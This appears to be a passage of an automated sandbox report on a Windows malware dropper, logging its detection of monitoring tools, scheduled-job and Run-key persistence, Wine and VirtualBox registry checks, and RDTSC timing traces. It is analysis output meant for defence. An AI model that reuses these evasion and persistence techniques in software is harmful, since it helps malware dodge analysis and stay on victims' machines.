Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f20b4c0961.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f20b4c0961.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e2af9f55fd.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e2af9f55fd.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d146970153.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d146970153.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 44452951d3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 44452951d3.exe Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B1582 second address: 7B15A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F16Ah 0x00000007 jmp 00007F7A2D39F175h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B15A9 second address: 7B15AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B15AD second address: 7B15B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B15B9 second address: 7B15BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B15BF second address: 7B15CC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B49D8 second address: 7B49DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B49DC second address: 7B4A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F7A2D39F171h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push edx 0x00000012 jmp 00007F7A2D39F173h 0x00000017 pop edx 0x00000018 mov eax, dword ptr [eax] 0x0000001a push edi 0x0000001b pushad 0x0000001c jmp 00007F7A2D39F174h 0x00000021 push edx 0x00000022 pop edx 0x00000023 popad 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4A33 second address: 7B4A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4A37 second address: 7B4A4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F16Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4A4C second address: 7B4ABC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 adc si, B0EEh 0x0000000d push 00000003h 0x0000000f mov dword ptr [ebp+122D19E2h], esi 0x00000015 push 00000000h 0x00000017 jns 00007F7A2CC6ACECh 0x0000001d mov dword ptr [ebp+122D24B4h], eax 0x00000023 push 00000003h 0x00000025 add dword ptr [ebp+122D1F84h], eax 0x0000002b mov edx, dword ptr [ebp+122D3B53h] 0x00000031 push 964B90F3h 0x00000036 jmp 00007F7A2CC6ACF4h 0x0000003b xor dword ptr [esp], 564B90F3h 0x00000042 mov dword ptr [ebp+122D2B95h], edx 0x00000048 add dword ptr [ebp+122D1F84h], ecx 0x0000004e lea ebx, dword ptr [ebp+124597C5h] 0x00000054 xor dword ptr [ebp+122D21FFh], esi 0x0000005a xchg eax, ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4ABC second address: 7B4AC6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7A2D39F166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4AC6 second address: 7B4ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4B59 second address: 7B4B8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F7A2D39F16Ch 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 jmp 00007F7A2D39F176h 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4B8A second address: 7B4B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4B8E second address: 7B4C33 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov di, si 0x0000000b sbb dx, 5AD1h 0x00000010 push 00000000h 0x00000012 adc dh, 00000056h 0x00000015 push BE14CC30h 0x0000001a push eax 0x0000001b je 00007F7A2D39F17Fh 0x00000021 jmp 00007F7A2D39F179h 0x00000026 pop eax 0x00000027 add dword ptr [esp], 41EB3450h 0x0000002e jmp 00007F7A2D39F170h 0x00000033 push 00000003h 0x00000035 jnc 00007F7A2D39F16Ch 0x0000003b mov edi, dword ptr [ebp+122D2C01h] 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 call 00007F7A2D39F168h 0x0000004b pop eax 0x0000004c mov dword ptr [esp+04h], eax 0x00000050 add dword ptr [esp+04h], 00000016h 0x00000058 inc eax 0x00000059 push eax 0x0000005a ret 0x0000005b pop eax 0x0000005c ret 0x0000005d mov edi, 6E55D5FEh 0x00000062 push 00000003h 0x00000064 jmp 00007F7A2D39F170h 0x00000069 call 00007F7A2D39F169h 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 push edi 0x00000072 pop edi 0x00000073 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4C33 second address: 7B4C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4C37 second address: 7B4C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
